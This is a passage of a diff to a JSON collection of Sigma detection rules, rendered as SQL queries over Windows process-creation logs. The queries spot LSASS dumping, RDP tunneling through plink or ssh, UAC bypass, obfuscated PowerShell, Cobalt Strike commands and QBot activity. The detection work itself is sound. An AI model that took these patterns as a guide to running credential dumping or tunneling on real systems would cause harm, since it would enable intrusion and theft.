LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE 
'\\'))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "status": "experimental", + "description": "Detects execution of rundll32 where the DLL being called is stored in an 
Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1564.004" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\vbc.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE 
'%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\')) AND NOT ((NewProcessName = '') OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName IN ('-', '')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentProcessName LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE '%.scr' ESCAPE '\\') OR (NewProcessName 
LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE 
'\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Administrative activity", + "Software installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = 
'4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { "title": "Suspicious Rundll32 Invoking Inline VBScript", 
@@ -11241,1218 +10891,1209 @@ "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE 'wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "title": 
"Rundll32 Registered COM Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", - "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". 
Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "status": "test", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detect commandline usage of Microsoft Connection Manager 
Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.005" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE 
'%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_malware_qbot.yml" + }, + { + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", "status": "test", - "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\"\\\\system32\\\\cleanmgr.exe /autoclean /d C:' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_uac_bypass_cleanmgr.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Potential 